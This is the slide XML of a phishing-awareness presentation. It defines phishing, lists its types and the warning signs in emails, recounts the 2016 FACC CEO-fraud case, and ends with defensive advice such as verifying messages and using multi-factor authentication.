      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="A screen shot of a computer code&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B73C7C33-67F3-181C-CA92-AF623B7D07DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6169171" y="511762"/>
            <a:ext cx="5943600" cy="915035"/>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D2C0E7BC-54B8-DA28-E337-BB0642D91189}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6169171" y="1905000"/>
            <a:ext cx="2133600" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A screen shot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12BE8B65-DC7F-390D-3005-3B9538877CCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6169171" y="4015247"/>
            <a:ext cx="5943600" cy="1351280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1266665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EF125C3-99F8-5ABF-1328-0370F112121B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="835370" y="643842"/>
            <a:ext cx="10515601" cy="1140849"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Final thoughts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48EA189C-8A41-5C63-2470-06541519CBCD}"/>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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Table Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF887A30-AD2A-73A0-8BB1-EB2BE9912DAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="tbl" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="835025" y="2560638"/>
            <a:ext cx="10137775" cy="3478212"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Phishing attacks are designed to deceive you into giving up sensitive information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Always verify the legitimacy of emails, websites, and messages before responding or clicking.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use extra layers of security, like multi-factor authentication, to protect your accounts.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33040680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CE1ABEC8-43FD-4F21-A7D2-70200D86263C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="835831" y="173735"/>
            <a:ext cx="4409514" cy="2203704"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>THANK YOU</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE5F2E56-9F77-E1C2-EC04-EA959822CA61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="831850" y="3079119"/>
            <a:ext cx="4413250" cy="2752725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Riha Singh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2395464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A2458FF-0D0C-4ACC-C6FB-103BC0BADCCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838201" y="365125"/>
            <a:ext cx="4466502" cy="2063282"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Agenda</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1239C0E-3F39-787D-0FC3-6B7C9BA37E8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838201" y="2638270"/>
            <a:ext cx="4466504" cy="3864766"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Types of Phishing Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identifying </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Phishing Emails</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>2 Biggest scams</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Social Engineering Tactics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Preventative measures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Phishing in Action</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1460159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EB8B-0AB9-7554-AEEA-E8D744959E9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6889627" y="173736"/>
            <a:ext cx="4352662" cy="2203704"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>What is phishing?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture Placeholder 5" descr="A blue and purple spiral">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05B64636-376E-96D4-B550-D764B2C6A6A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="37"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3" cstate="screen">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="202" b="202"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="336550" y="336550"/>
            <a:ext cx="5303640" cy="6184900"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB2F5F9A-B16D-CA49-7F40-A0142E41DC56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="36"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6889626" y="3104277"/>
            <a:ext cx="4535457" cy="3022201"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Phishing is a form of cyber attack where attackers impersonate legitimate organizations or individuals to steal sensitive information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common targets include login credentials, financial data, personal information etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{921DB868-BEE2-49F7-9AC5-A3B143880250}"/>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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9103156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60903-003B-273E-3584-5312F76C3EF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3305669" y="113097"/>
            <a:ext cx="7420819" cy="1656304"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Types of phishing attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74160DFF-2E7E-7A22-819A-C011020DFF01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="31"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3305669" y="2470150"/>
            <a:ext cx="7420819" cy="3676649"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Email Phishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Fraudulent emails that appear to come from trusted sources like banks, tech companies, or government bodies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Spear Phishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Targeted attack, usually personalized, aimed at specific individuals or organizations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Document-based Phishing: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Word documents can contain macros. Attackers may use malicious macros to install malware or steal data when the document is opened.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64347AE7-D6A2-42FB-3D58-6297742FC35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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1962637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29A4-AAFD-04EE-0732-0671E83D5EF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2399620" y="162560"/>
            <a:ext cx="8843050" cy="1616904"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identifying phishing emails</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F09FEE91-E849-1CB0-9E51-A58B99C631C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="35"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2373002" y="2474811"/>
            <a:ext cx="9071746" cy="3528397"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Suspicious or Generic Greetings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Emails starting with “Dear Customer” or “Dear User” instead of your name.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Urgent or Threatening Language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Emails pressuring you to take immediate action or face consequences (e.g., account suspension).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Unusual or Unexpected Attachments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Be cautious of opening attachments from unknown or untrusted sources.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Suspicious Links</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Hover over links to check if they lead to suspicious or misspelled URLs.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23E23533-91C6-420C-B7D7-4977ACF73AC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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="107360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E50F8-6D77-D9A3-9D5E-5B53028845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1E3D35-4F7D-9D5F-68F0-4D3912366C67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2373002" y="296656"/>
            <a:ext cx="8869668" cy="1487174"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3600">
                <a:latin typeface="Copperplate Gothic Bold" panose="020E0705020206020404" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>one of the biggest phishing spam of all time</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="3600"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>FACC $61</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA35BCAE-8444-F69D-EB64-68D571B4F4DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="35"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2373002" y="2057400"/>
            <a:ext cx="9071746" cy="4638039"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Bahnschrift SemiBold SemiConden" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In January 2016, an employee at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift SemiBold SemiConden" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Austrian aerospace parts manufacturer FACC received an email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Bahnschrift SemiBold SemiConden" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> asking the organisation to transfer $61 million to another account as part of an “acquisition project”. The message appeared to come from the organisation’s CEO, Walter Stephan, but was in fact a scam.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Bahnschrift SemiBold SemiConden" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Unable to spot the true nature of the email, the employee complied with the request. Few details were revealed about exactly what went wrong, but there is reason to believe that Stephan was at least partially at fault. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Bahnschrift SemiBold SemiConden" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>That’s because FACC fired him following an internal investigation, claiming that he had “severely violated his duties”. It also fired its chief financial officer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Bahnschrift SemiBold SemiConden" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>FACC sought $11 million in legal damages from the executives, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Bahnschrift SemiBold SemiConden" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>the lawsuit was dismissed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Bahnschrift SemiBold SemiConden" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> by the Austrian courts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
